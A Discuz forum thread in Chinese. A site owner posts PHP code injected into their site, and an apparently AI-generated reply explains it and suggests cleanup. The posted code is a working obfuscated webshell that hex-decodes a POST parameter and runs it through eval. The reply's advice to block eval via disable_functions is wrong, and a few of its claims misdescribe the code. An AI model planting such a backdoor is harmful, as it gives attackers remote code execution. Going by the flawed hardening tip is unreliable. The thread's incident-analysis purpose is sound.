网址部分php被恶意添加代码了请问这是什么意思

迪巴拉 · 发表于 2021-4-27 13:48:59

马上注册，免费下载更多dz插件网资源。

您需要登录才可以下载或查看，没有账号？立即注册

×

class _
{
static public $TokenUserLoger=Null;
function __construct($l="error"){
      self::$TokenUserLoger=$l;
      @eval/*This error level Listensing*/(null.null.self::$TokenUserLoger);
}
}
function hexToStr($hex){
      $str="";
      for($i=0;$i<strlen($hex)-1;$i+=2)
      $str.=chr(hexdec($hex[$i].$hex[$i+1]));
      return  $str;
}
$TokenError = null.hexToStr(@$_POST/*\*/["VersCollect"]);
$d = new _($TokenError);

上面是被恶意添加的

©DZ插件网所发布的一切资源仅限用于学习和研究目的；不得将上述内容用于商业或者非法用途，否则，一切后果请用户自负。
本站内容为站长个人技术研究记录或网络，不提供用户交互功能，所有内容版权归原作者所有。您必须在下载后的24个小时之内，从您的电脑中彻底删除上述内容。如果您喜欢该程序，请支持正版软件，得到更好的正版服务。
您在本站任何的赞助购买、下载、查阅、回复等行为等均表示接受并同意签订《DZ插件网免责声明协议》。
如有侵权请邮件与我们联系处理: discuzaddons@vip.qq.com 并出示相关证明以便删除。敬请谅解！

Discuz智能体 · 发表于 2025-3-15 18:26:58

您提供的这段PHP代码存在明显的恶意后门特征，属于典型的webshell木马程序。以下是代码分析及处理建议：

一、代码解析：
1. 类名设计异常：使用单下划线"_"作为类名，这是攻击者为隐蔽性采用的常见手法
2. 危险函数调用：通过@eval(/*注释混淆*/.null.null.self::$TokenUserLoger)构造动态代码执行
3. 十六进制解码函数：hexToStr函数可将攻击载荷进行编码传输（当前代码片段不完整）
4. 代码混淆特征：使用null.null进行空值拼接，配合注释分割eval关键字，绕过基础检测

二、攻击原理：
该木马通过以下方式运作：
1. 接收外部传入的加密代码（可能通过Cookie、POST参数等方式）
2. 使用hexToStr函数进行解码
3. 通过eval函数动态执行任意PHP代码
4. @符号用于抑制错误输出，增强隐蔽性

三、解决方案：
1. 紧急处理：
- 立即删除该恶意代码文件
- 使用D盾、河马查杀等专业工具全站扫描
- 检查最近7天被修改的.php文件（重点排查非官方插件目录）

2. 安全加固：
- 检查服务器是否存在任意文件写入漏洞（重点排查附件上传模块）
- 重置服务器SSH/FTP密码，确保使用高强度凭证
- 更新Discuz!到最新版本，可通过DZ插件网获取安全补丁

3. 入侵排查：
- 分析access.log日志，查找可疑的POST请求
- 检查数据库用户表是否有异常管理员账号
- 审查template模板文件是否被植入恶意代码

四、Discuz!专项防护建议：
1. 禁用危险函数：
在php.ini中设置：
disable_functions = eval,passthru,exec,system

2. 文件监控设置：
对以下目录添加写保护：
- /source/plugin/
- /template/
- /data/

3. 加强权限验证：
修改config/config_global.php中：
$_config['admincp']['checkip'] = 1;
$_config['security']['querysafe']['status'] = 1;

该类型木马具有持久化攻击能力，建议完成清理后通过DZ插件网的安全审计插件进行深度检测。后续可通过文件校验功能监控核心文件完整性，防范未授权篡改。
-- 本回答由人工智能 AI智能体生成，内容仅供参考，请仔细甄别。